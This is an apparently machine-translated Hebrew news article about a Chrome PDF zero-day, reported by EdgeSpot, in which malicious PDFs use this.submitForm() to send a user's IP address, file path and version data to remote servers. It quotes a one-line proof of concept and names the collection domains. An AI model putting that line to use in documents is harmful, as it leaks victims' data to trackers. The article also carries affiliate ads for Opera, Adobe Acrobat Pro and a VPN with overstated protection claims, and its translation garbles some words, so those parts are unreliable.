באג של Chrome מאפשר להאקרים לאסוף נתוני משתמשים באמצעות קבצי PDF

שירות זיהוי הניצול EdgeSpot גילה מסקרן כרום פגיעות באפס יום המנצלת מסמכי PDF.

הפגיעות מאפשרת לתוקפים קציר נתונים רגישים באמצעות מסמכי PDF זדוניים שנפתחו ב- Chrome.

ברגע שהקורבן פותח את קבצי ה- PDF בהתאמה בגוגל כרום, תוכנית זדונית מתחילה לעבוד ברקע על ידי איסוף נתוני משתמשים.

לאחר מכן הנתונים מועברים לשרת המרוחק שנשלט על ידי ההאקרים. ייתכן שאתה תוהה אילו נתונים נשאבים על ידי התוקפים, הם מכוונים את הנתונים הבאים במחשב שלך:

• כתובת ה - IP
• נתיב מלא של קובץ ה- PDF במערכת
• גרסאות מערכת הפעלה ו- Chrome

היזהר מקבצי PDF שמקורם בתוכנות זדוניות

מומחים מְנוּקָד שאחד משני התחומים הודיעו מחדש [.] com אוֹ burpcollaborator [.] נטו קיבל את הנתונים.

הם גילו כי התוקפים משתמשים ב- this.submitForm () API Javascript PDF לאיסוף המידע הרגיש של המשתמשים.

בדקנו את זה עם PoC מינימלי, שיחת API פשוטה כמו this.submitForm (' http://google.com/test’) יגרום ל- Google Chrome לשלוח את הנתונים האישיים ל- google.com.

באג Chrome זה נוצל על ידי שתי קבוצות שונות של קבצי PDF זדוניים, שניהם הופצו באוקטובר 2017 ובספטמבר 2018, בהתאמה.

יש לציין שהנתונים שנאספו יכולים לשמש את התוקפים לצורך כוונון התקפות בעתיד. דיווחים מראים כי אצוות הקבצים הראשונה נערכה באמצעות שירות המעקב של PDF של ReadNotify.

משתמשים יכולים להשתמש בשירות כדי לעקוב אחר תצוגות המשתמשים. EdgeSpot לא שיתף פרטים לגבי אופי הקבוצה השנייה של קבצי PDF.

טיפ מהיר: שנה את הדפדפן שלך לאופרה

בזמנים בעייתיים אלה, אנו מותקפים בתוכנות זדוניות, פישינג וטרויאנים בכל צעד ושעל ולכן עלינו להיות ערניים יותר ולהישאר מוגנים.

ומכיוון שזו בעיה ספציפית ל- Chrome, אתה יכול להימנע מאותו איום ומכל האחרים באמצעות דפדפן מוכוון אבטחה אוֹפֵּרָה.

דפדפן זה מגיע עם חוסם מודעות מובנה שלא רק מנקה הסחות דעת כאלה אלא גם חוסם סקריפטים לניתוח, פיקסלים למעקב ושיטות לאיסוף הנתונים שלך.

ואם אתה רוצה להיות בטוח לחלוטין שאתה מתרחק מכל סכנה, היגש מאחורי המובנה VPN שירות שהוא 100% לשימוש חופשי לזמן בלתי מוגבל.

אוֹפֵּרָה

אופרה מציעה את הגנת האיומים המושלמת באמצעות חוסם הפרסום המובנה ושירות ה- VPN בחינם!

קבל את זה בחינם
בקר באתר

איך אוכל להישאר מוגן מפגיעות PDF?

הורד את Adobe Acrobat PRO

Adobe ו- Chrome מתאימים היטב בכל מה שקשור לטיפול בקבצי PDF. על ידי התקנת תוסף Adobe ל- Chrome, תוכל לבדוק ולבצע מניפולציה של קובצי PDF לפי רצונך מבלי לעזוב את הדפדפן המועדף עליך.

למרות המבנה החזק שלה, ייתכן שתוכנות זדוניות המסתתרות בקבצי PDF לא יתגלו אם אתה משתמש בגרסה הרגילה של ה- Reader.

הגרסה המקצועית מומלצת על מנת להבטיח את הגנתך ולהרחיק את הנתונים שלך מהאקרים.

למרות שזה לא בחינם, המחיר שתשלמו הוא קטן למדי עבור שפע התכונות הנוספות שתיהנו מהם כולל האבטחה המשופרת של קבצי ה- PDF שלכם.

יש גם ניסיון ללא תשלום למשך 7 ימים, כך שתוכלו לטעום מחוויית ה- Pro המלאה לפני ביצוע הרכישה.

Adobe Acrobat PRO

התרחק מתוכנות זדוניות על ידי הורדת Adobe Acrobat PRO. יש לו הרבה יותר תכונות מאשר הגרסה החינמית ושומר על אבטחת הנתונים שלך.

ניסיון בחינם
בקר באתר

---

במקרה שתרצה להיות מאובטח בזמן שאתה גולש באינטרנט, תצטרך להשיג כלי ייעודי מלא לאבטחת הרשת שלך. התקן כעת גישה לאינטרנט פרטי ותבטיח את עצמך. זה מגן על המחשב האישי שלך מפני התקפות בזמן הגלישה, מסווה את כתובת ה- IP שלך וחוסם כל גישה לא רצויה.

---

שירות זיהוי הניצול EdgeSpot רצה להתריע בפני משתמשי Chrome על הסיכונים האפשריים מכיוון שהתיקון לא היה צפוי להשתחרר בזמן הקרוב.

EdgeSpot דיווחה לגוגל על ​​הפגיעות בשנה שעברה והחברה הבטיחה לשחרר תיקון בסוף אפריל.

עם זאת, תוכל לשקול להשתמש בפתרון זמני לבעיה על ידי צפייה מקומית במסמכי PDF שהתקבלו באמצעות אפליקציית קורא אחרת.

לחלופין, תוכל גם לפתוח את מסמכי ה- PDF שלך ב- Chrome על ידי ניתוק המערכות שלך מהאינטרנט.